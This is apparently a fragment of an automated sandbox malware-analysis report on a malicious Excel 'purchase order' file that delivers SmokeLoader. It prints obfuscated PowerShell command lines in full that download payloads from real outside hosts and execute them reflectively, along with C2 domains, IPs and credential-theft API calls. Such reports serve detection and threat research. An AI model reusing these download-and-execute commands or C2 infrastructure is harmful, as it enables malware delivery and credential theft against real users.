zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", CommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0c
          Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe
          Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3648, TargetFilename: C:\Users\user\AppData\Local\Temp\kj0hyxr0.kun.ps1

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SysTEM32\wiNdoWSPoWeRShElL\V1.0\PoWERsHeLl.EXe" "pOWersheLL -Ex BYPaSs -nop -W 1 -c DeVIcECrEdenTiAldePlOYMEnT.exe ; INvokE-EXPressiON($(INvOkE-ExpressiON('[SystEM.tExt.encoDinG]'+[char]0X3A+[char]58+'UTF8.GetsTRIng([SyStEm.cOnVeRT]'+[ChaR]0X3A+[chaR]58+'frombasE64StRIng('+[chaR]34+'JFhvY0VSN21mYWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVSZEVGaW5pVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkbkhyTG8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgamxXTWh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEwsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFVEd1JCWENTLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHFFS3ZxKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZHpUayIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZVNQQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbHhzQnRTTVB2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRYb2NFUjdtZmFjOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzgvNTMvc2VlbXliZXN0bmV0d29ya3doaWNoZ2l2ZWJlc3R0aGluZ3NlbnRpcmVsaWZld2l0aG1lLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVteWJlc3RuZXR3b3Jrd2hpY2hnaXZlYmVzdHRoaW5nc2VudGlyZWxpZmV3aXRoLnZiUyIsMCwwKTtzVEFydC1zbEVFUCgzKTtJRVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZW15YmVzdG5ldHdvcmt3aGljaGdpdmViZXN0dGhpbmdzZW50aXJlbGlmZXdpdGgudmJTIg=='+[chaR]0X22+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3648, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.cmdline", ProcessId: 3860, ProcessName: csc.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T18:21:30.915644+010020241971A Network Trojan was detected107.172.44.17880192.168.2.2249162TCP
          2024-11-18T18:21:33.487520+010020241971A Network Trojan was detected107.172.44.17880192.168.2.2249164TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T18:21:30.915631+010020244491Attempted User Privilege Gain192.168.2.2249162107.172.44.17880TCP
          2024-11-18T18:21:33.487505+010020244491Attempted User Privilege Gain192.168.2.2249164107.172.44.17880TCP
          2024-11-18T18:21:59.492820+010020244491Attempted User Privilege Gain192.168.2.2249171107.172.44.17880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T18:22:00.252623+010020490381A Network Trojan was detected142.215.209.78443192.168.2.2249166TCP
          2024-11-18T18:22:23.312355+010020490381A Network Trojan was detected142.215.209.78443192.168.2.2249173TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T18:22:42.390367+010020391031A Network Trojan was detected192.168.2.224917546.173.214.2480TCP
          2024-11-18T18:22:58.747956+010020391031A Network Trojan was detected192.168.2.224917646.173.214.2480TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T18:21:43.833570+010028587951A Network Trojan was detected192.168.2.2249165107.172.44.17880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-18T18:22:42.710414+010028298482Potentially Bad Traffic46.173.214.2480192.168.2.2249175TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsAvira: detected
          Source: http://prolinice.ga/index.phpAvira URL Cloud: Label: malware
          Source: http://vilendar.ga/index.phpAvira URL Cloud: Label: malware
          Source: C:\Users\user\AppData\Local\Temp\~DF7DC820911769618A.TMPAvira: detection malicious, Label: TR/AVI.Agent.xoswb
          Source: 0000001E.00000002.522714130.00000000000C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://prolinice.ga/index.php", "http://vilendar.ga/index.php"]}
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsReversingLabs: Detection: 27%
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsJoe Sandbox ML: detected
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00123098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,38_2_00123098
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00123717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,38_2_00123717
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00123E04 RtlCompareMemory,CryptUnprotectData,38_2_00123E04
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00121198 CryptBinaryToStringA,CryptBinaryToStringA,38_2_00121198
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_001211E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,38_2_001211E1
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_0012123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,38_2_0012123B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00121FCE CryptUnprotectData,RtlMoveMemory,38_2_00121FCE
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 40_2_000826AC lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,40_2_000826AC

          Phishing

          barindex
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat[1].hta, type: DROPPED
          Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49166 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.22:49173 version: TLS 1.0
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: unknownHTTPS traffic detected: 5.45.108.48:443 -> 192.168.2.22:49161 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 5.45.108.48:443 -> 192.168.2.22:49163 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 5.45.108.48:443 -> 192.168.2.22:49170 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 5.45.108.48:443 -> 192.168.2.22:49168 version: TLS 1.2
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.pdbhP source: powershell.exe, 00000013.00000002.494305051.00000000026DA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.pdb source: powershell.exe, 00000006.00000002.447990130.0000000002281000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: vtjrhji, 00000024.00000000.566239808.0000000000F72000.00000020.00000001.01000000.0000000A.sdmp, vtjrhji.31.dr
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.pdbhP source: powershell.exe, 00000006.00000002.447990130.0000000002281000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.pdb source: powershell.exe, 00000013.00000002.494305051.000000000218B000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00121D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,38_2_00121D4A
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00123ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,38_2_00123ED9
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 38_2_00122B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,38_2_00122B15
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 40_2_0008255C lstrcatW,PathAppendW,FindFirstFileW,RtlZeroMemory,lstrcatW,PathAppendW,lstrcatW,PathAppendW,StrStrIW,FindNextFileW,FindClose,40_2_0008255C
          Source: C:\Windows\explorer.exeCode function: 42_2_00061EB4 FindFirstFileW,42_2_00061EB4
          Source: C:\Windows\explorer.exeCode function: 42_2_00061DB0 FindFirstFileW,42_2_00061DB0
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: global trafficDNS query: name: link.uebie.de
          Source: global trafficDNS query: name: link.uebie.de
          Source: global trafficDNS query: name: 1017.filemail.com
          Source: global trafficDNS query: name: 1017.filemail.com
          Source: global trafficDNS query: name: link.uebie.de
          Source: global trafficDNS query: name: 1017.filemail.com
          Source: global trafficDNS query: name: 1017.filemail.com
          Source: global trafficDNS query: name: prolinice.ga
          Source: global trafficDNS query: name: prolinice.ga
          Source: global trafficDNS query: name: prolinice.ga
          Source: global trafficDNS query: name: prolinice.ga
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49170 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49164 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49172 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49174 -> 107.172.44.178:80
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49161 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49163 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49167 -> 5.45.108.48:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
          Source: global trafficTCP traffic: 192.168.2.22:49166 -> 142.215.209.78:443
